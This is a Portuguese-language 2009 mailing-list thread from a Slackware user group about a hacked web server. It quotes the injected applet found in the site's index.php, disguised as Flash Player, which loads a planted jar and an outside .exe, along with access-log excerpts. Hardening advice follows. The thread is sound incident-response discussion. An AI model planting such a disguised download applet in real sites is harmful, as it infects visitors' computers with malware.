Uma coisa legal para segurança que sempre faço é ir no /etc/shell e acrescentar no final "false" depois é só editar o /etc/passwd e modificar a linha final do usuário ou seja onde está /bash coloque /false. Só fique atento quando for instalar algum software que exija o bash, um exemplo é o firebird ou o icecast.
Ananias Filho escreveu: > > relamente o 777 nas pastas com arquivos visíveis na web, são falhas de > segurança =) > > Acho crucial em um momento como estes, verificar os usuários do sistema. > Verifica se nenhum usuário foi criado. > Quando invadiram um servidor testes q eu tinha (não havia nada dentro > dele era teste mesmo), adicionaram e modificaram os usuários chamados > *proxy*, *ssh*, *ftp, system *etc... > > ex. > o usuário ftp já existe no passwd > porém, sem acesso a shell > o cara deu acesso a shell ao usuário ftp e ainda colocou ele com uid > administrativa =) > não me prejudicou em nada pelo servidor ser somente e exclusivamente > de testes. > Mas haviam mais de 500 emails enviados pelo sendmail (acham q eu ia > deixar sendmail configurado?) > alteração no index principal do apache e ainda adicionou um vhost :S > (Cara mau! pq não me pediu espaço?) > Lembrando que a máquina nem firewall tinha. Era espetada na rede e pronto. > outras tantas besteirinhas aconteceram mas foi legal a experiência > > pois bem > fica atento e faz uma faxina no teu server ai. > > 2009/8/11 Jorge Filho <[email protected] <mailto:[email protected]>> > > Olá pessoal, obrigado pelas ajudas. > > O que eu consegui rastrear até agora foi o seguinte, o cara > conseguiu editar o index.php do site e colocou o seguinte applet: > > <applet name="Adobe FlashPlayer" code="Inicio.class" > archive="http://www.exemplo.com/audio/FlashPlayer.jar"; height="10" > width="1"> > <param name="url" > value="http://merlincosmeticos.com.br/cache/foto125.exe";> > </applet> > > Ele também adicionou esse FlashPlayer.jar no diretório audio do > servidor, e tinha também esse arquivo asd.html na raiz. > As datas dos arquivos são: > > -rw------- 1 www-data www-data 9,8K 2009-08-10 22:53 FlashPlayer.jar > -r-xr-xr-x 1 www-data www-data 12K 2009-08-11 14:03 index.php > > No logo do /var/log/apache/access.log está o seguinte: > > 201.78.54.160 - - [10/Aug/2009:15:03:17 -0300] "GET /asd.html > HTTP/1.1" 200 808 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; > pt-BR; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13" > 189.26.198.238 - - [10/Aug/2009:15:07:01 -0300] "GET /asd.html > HTTP/1.1" 200 808 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; > pt-BR; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" > 189.26.198.238 - - [10/Aug/2009:15:07:39 -0300] "GET /asd.html > HTTP/1.1" 304 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; > pt-BR; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" > 189.26.198.238 - - [10/Aug/2009:15:09:43 -0300] "GET /asd.html > HTTP/1.1" 304 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; > pt-BR; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" > 201.89.53.126 - - [10/Aug/2009:15:48:12 -0300] "GET /asd.html > HTTP/1.1" 200 808 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows > NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30618)" > > Se procurar FlashPlayer.jar no log então, acha muito, porque muita > gente deve ter baixado. > > Outra coisa que acho que pode ser uma falha na segurança também é > que todos os arquivos estavam com permissão 777 > > Sobre o ftp, tem alguns usuários com senha fraca sim, mais o ftp > roda em chroot com autenticação mysql, o usuário já cai na pasta > sem ter como sair, acho dificil ter acontecido algo pelo ftp, mas > claro, nada é impossível. > > Vou analisar mais coisas aqui, mas to meio confuso, é a primeira > vez que tenho um ataque no servidor, situação estranha, mais agora > tenho que aprender como o cara fez isso pra consertar o que tá errado. > > > 2009/8/11 Herbert Faleiros <[email protected] > <mailto:[email protected]>> > > > On Tue 11 Aug 2009 18:19:12 Jorge Filho wrote: > > Hoje aconteceu algo muito estranho no meu server web, de > manhã, quando > > alguém entrava no site aparecia uma tela pedindo pra executar um > > javascript. Qual não foi minha surpresa quando vi um arquivo > diferente na > > raiz do meu site, com nome de asd.html? > > > > Com é possível isso ter acontecido? Que tipo de configuração > eu devo > > verificar se tem problema? Fiquei sem saber o que fazer. > > > examine seus logs, com certeza vai encontrar mais > informações... Verifique os > softwares em execução e procure atualizações de segurança. > Execute ferramentas > p/ buscar por rootkits e exploits e verifique quem tem mais > acesso ao seu > sistema (tá com cara de que isso foi "manual"). > > -- > Herbert > > > > > > > > > > -- > kram3r > > > __________ Information from ESET NOD32 Antivirus, version of virus signature database 4328 (20090812) __________ The message was checked by ESET NOD32 Antivirus. http://www.eset.com --~--~---------~--~----~------------~-------~--~----~ GUS-BR - Grupo de Usuários de Slackware Brasil http://www.slackwarebrasil.org/ http://groups.google.com/group/slack-users-br Antes de perguntar: http://www.istf.com.br/perguntas/ Para sair da lista envie um e-mail para: [email protected] -~----------~----~----~----~------~----~------~--~---
